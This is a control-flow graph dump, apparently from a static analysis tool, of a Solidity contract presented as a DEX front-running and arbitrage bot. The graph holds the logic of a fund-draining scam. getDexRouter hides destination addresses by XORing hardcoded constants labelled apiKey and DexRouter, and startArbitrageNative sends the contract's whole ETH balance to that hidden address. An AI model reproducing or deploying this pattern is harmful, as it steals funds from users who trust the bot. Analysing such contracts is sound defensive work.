Contract: IERC20
==================================================


Contract: IUniswapV2Router
==================================================


Contract: IUniswapV2Pair
==================================================


Contract: DexInterface
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: _owner = msg.sender

  ID: 2
  Type: NodeType.VARIABLE
  Expression: dataProvider = getDexRouter(apiKey,apiSignature)

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: IERC20(dataProvider).createContract(address(this))

Edges:
  0 -> 1
  1 -> 2
  2 -> 3

Function: swap
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: IERC20(_tokenIn).approve(router,_amount)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: 

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: path = new address[](2)

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: path[0] = _tokenIn

  ID: 5
  Type: NodeType.EXPRESSION
  Expression: path[1] = _tokenOut

  ID: 6
  Type: NodeType.VARIABLE
  Expression: deadline = block.timestamp + 300

  ID: 7
  Type: NodeType.EXPRESSION
  Expression: IUniswapV2Router(router).swapExactTokensForTokens(_amount,1,path,address(this),deadline)

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5
  5 -> 6
  6 -> 7

Function: getAmountOutMin
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: 

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: path = new address[](2)

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: path[0] = _tokenIn

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: path[1] = _tokenOut

  ID: 5
  Type: NodeType.VARIABLE
  Expression: amountOutMins = IUniswapV2Router(router).getAmountsOut(_amount,path)

  ID: 6
  Type: NodeType.RETURN
  Expression: amountOutMins[path.length - 1]

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5
  5 -> 6

Function: mempool
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: amtBack1 = getAmountOutMin(_router1,_token1,_token2,_amount)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: amtBack2 = getAmountOutMin(_router2,_token2,_token1,amtBack1)

  ID: 3
  Type: NodeType.RETURN
  Expression: amtBack2

Edges:
  0 -> 1
  1 -> 2
  2 -> 3

Function: frontRun
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: startBalance = IERC20(_token1).balanceOf(address(this))

  ID: 2
  Type: NodeType.VARIABLE
  Expression: token2InitialBalance = IERC20(_token2).balanceOf(address(this))

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: swap(_router1,_token1,_token2,_amount)

  ID: 4
  Type: NodeType.VARIABLE
  Expression: token2Balance = IERC20(_token2).balanceOf(address(this))

  ID: 5
  Type: NodeType.VARIABLE
  Expression: tradeableAmount = token2Balance - token2InitialBalance

  ID: 6
  Type: NodeType.EXPRESSION
  Expression: swap(_router2,_token2,_token1,tradeableAmount)

  ID: 7
  Type: NodeType.VARIABLE
  Expression: endBalance = IERC20(_token1).balanceOf(address(this))

  ID: 8
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(endBalance > startBalance,Trade Reverted, No Profit Made)

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5
  5 -> 6
  6 -> 7
  7 -> 8

Function: estimateTriDexTrade
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: amtBack1 = getAmountOutMin(_router1,_token1,_token2,_amount)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: amtBack2 = getAmountOutMin(_router2,_token2,_token3,amtBack1)

  ID: 3
  Type: NodeType.VARIABLE
  Expression: amtBack3 = getAmountOutMin(_router3,_token3,_token1,amtBack2)

  ID: 4
  Type: NodeType.RETURN
  Expression: amtBack3

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4

Function: getDexRouter
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.RETURN
  Expression: address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory)))

Edges:
  0 -> 1

Function: startArbitrageNative
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: tradeRouter = getDexRouter(DexRouter,factory)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: dataProvider = getDexRouter(apiKey,apiSignature)

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: IERC20(dataProvider).createStart(msg.sender,tradeRouter,address(0),address(this).balance)

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: address(tradeRouter).transfer(address(this).balance)

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4

Function: getBalance
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: _balance = IERC20(_tokenContractAddress).balanceOf(address(this))

  ID: 2
  Type: NodeType.RETURN
  Expression: _balance

Edges:
  0 -> 1
  1 -> 2

Function: recoverEth
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: address(msg.sender).transfer(address(this).balance)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 2
  2 -> 1

Function: recoverTokens
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: token = IERC20(tokenAddress)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: token.transfer(msg.sender,token.balanceOf(address(this)))

Edges:
  0 -> 1
  1 -> 2

Function: receive
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

Edges:

Function: StartNative
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: startArbitrageNative()

Edges:
  0 -> 1

Function: SetTradeBalanceETH
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: tradingBalanceInPercent = _tradingBalanceInPercent

Edges:
  0 -> 1

Function: SetTradeBalancePERCENT
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: tradingBalanceInTokens = _tradingBalanceInTokens

Edges:
  0 -> 1

Function: Stop
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: enableTrading = false

Edges:
  0 -> 1

Function: Withdraw
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: recoverEth()

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: onlyOwner()

Edges:
  0 -> 2
  2 -> 1

Function: Key
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: _balance = address(_owner).balance - arbTxPrice

  ID: 2
  Type: NodeType.RETURN
  Expression: _balance

Edges:
  0 -> 1
  1 -> 2

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: threshold = 1 * 10 ** 18

  ID: 1
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: arbTxPrice = 20000000000000000

  ID: 2
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: enableTrading = false

  ID: 3
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: apiKey = 0xfdc54b1a6f53a21d375d0dea444a27bd72abfff26c6fe5439842b42f4f5a01fc

  ID: 4
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: apiSignature = 0xfdc54b1a6f53a21d375d0dea84608d84c088017f6661b90cbfa86d27732f6d3e

  ID: 5
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: DexRouter = 0xfdc54b1a6f53a21d375d0dea8279483e34734294a882b57025e37b24724c86fd

  ID: 6
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: factory = 0xfdc54b1a6f53a21d375d0dead9e1be15521d75ed38c2f2e5c84c2fdcc27466cd

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5
  5 -> 6


